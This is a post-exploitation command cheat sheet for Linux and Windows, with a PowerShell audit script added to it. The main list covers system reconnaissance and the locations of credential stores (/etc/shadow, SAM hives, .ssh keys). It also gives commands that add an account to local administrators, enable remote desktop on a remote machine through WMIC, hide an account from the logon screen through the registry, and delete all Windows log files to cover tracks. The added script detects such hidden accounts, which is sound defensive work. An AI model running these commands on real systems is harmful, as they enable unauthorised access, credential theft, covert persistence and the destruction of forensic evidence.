Basic Information Gathering

Linux

  • /etc/resolv.conf
  • /etc/passwd
  • /etc/shadow
  • whoami and who -a
  • ifconfig -a, iptables -L -n, netstat -r
  • uname -a, ps aux
  • dpkg -l | head

Windows

  • ipconfig /all, ipconfig /displaydns, netstat -bnao, netstat -r
  • net view, net view /domain
  • net user /domain, net user %username% /domain
  • net accounts, net share
  • net localgroup administrators username /add
  • net group "Domain Controllers" /domain
  • net share name$=C:\ /unlimited
  • net user username /active:yes /domain

WMIC (Windows Management Instrumentation)

  • wmic nicconfig get ipaddress,macaddress
  • wmic computersystem get username
  • wmic netlogin get name,lastlogon
  • wmic process get caption,executablepath,commandline
  • wmic process where name="calc.exe" call terminate
  • wmic os get name,servicepackmajorversion
  • wmic product get name,version
  • wmic product where name="name" call uninstall /nointeractive
  • wmic share get /ALL
  • wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
  • wmic nteventlog get path,filename,writeable

Collecting Sensitive Data

Business information
System information

Linux

  • /etc ; /usr/local/etc
  • /etc/passwd ; /etc/shadow
  • .ssh ; .gnupg (public and private keys)
  • E-mail and data files
  • Business databases ; authentication server databases
  • /tmp

Windows

  • SAM database ; registry hive files
  • %SYSTEMROOT%\repair\SAM
  • %SYSTEMROOT%\System32\config\RegBack\SAM
  • Business databases ; authentication databases
  • Temporary file directories
  • %USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\

Hiding a newly created account from the logon screen

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0
del %WINDIR%\*.log /a /s /q /f
History
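A defender-side check for the registry technique above, added here as an example and not taken from the original cheat sheet: it enumerates the SpecialAccounts\UserList key and reports every account whose value is 0 (hidden from the logon screen), along with whether a matching local account exists. It assumes Windows PowerShell 5.1 or later with the Microsoft.PowerShell.LocalAccounts module (Get-LocalUser) and rights to read HKLM.

```powershell
# Added example, not part of the original cheat sheet: audit accounts hidden
# from the logon screen through the WinLogon SpecialAccounts\UserList key.
# Assumes Get-LocalUser is available (Microsoft.PowerShell.LocalAccounts).
$UserListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

function Get-HiddenLogonAccounts {
    # An absent key means no account is hidden this way: return an empty list.
    if (-not (Test-Path -Path $UserListKey)) { return @() }

    $key = Get-Item -Path $UserListKey
    $findings = foreach ($valueName in $key.GetValueNames()) {
        # A value of 0 hides the account named by the value from the logon screen.
        if ($key.GetValue($valueName) -ne 0) { continue }

        # Correlate with the local SAM; a miss means a stale entry or a domain account.
        $account   = Get-LocalUser -Name $valueName -ErrorAction SilentlyContinue
        $enabled   = $null
        $lastLogon = $null
        if ($account) {
            $enabled   = $account.Enabled
            $lastLogon = $account.LastLogon
        }

        [pscustomobject]@{
            Name        = $valueName
            LocalExists = [bool]$account
            Enabled     = $enabled
            LastLogon   = $lastLogon
            ValueKind   = $key.GetValueKind($valueName)
        }
    }
    return @($findings)
}

$hidden = Get-HiddenLogonAccounts
if ($hidden.Count -eq 0) {
    Write-Output 'No accounts are hidden from the logon screen via SpecialAccounts\UserList.'
} else {
    Write-Warning "$($hidden.Count) account(s) hidden from the logon screen:"
    $hidden | Format-Table -AutoSize
}
```

Any entry the script reports should be compared against the account creation time in the Security log and against the change history of the key, since a legitimate hidden account (such as a service account) is normally documented.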
Logs

  • auth.log / secure
  • btmp / wtmp
  • lastlog / faillog

Other logs, HIDS, etc.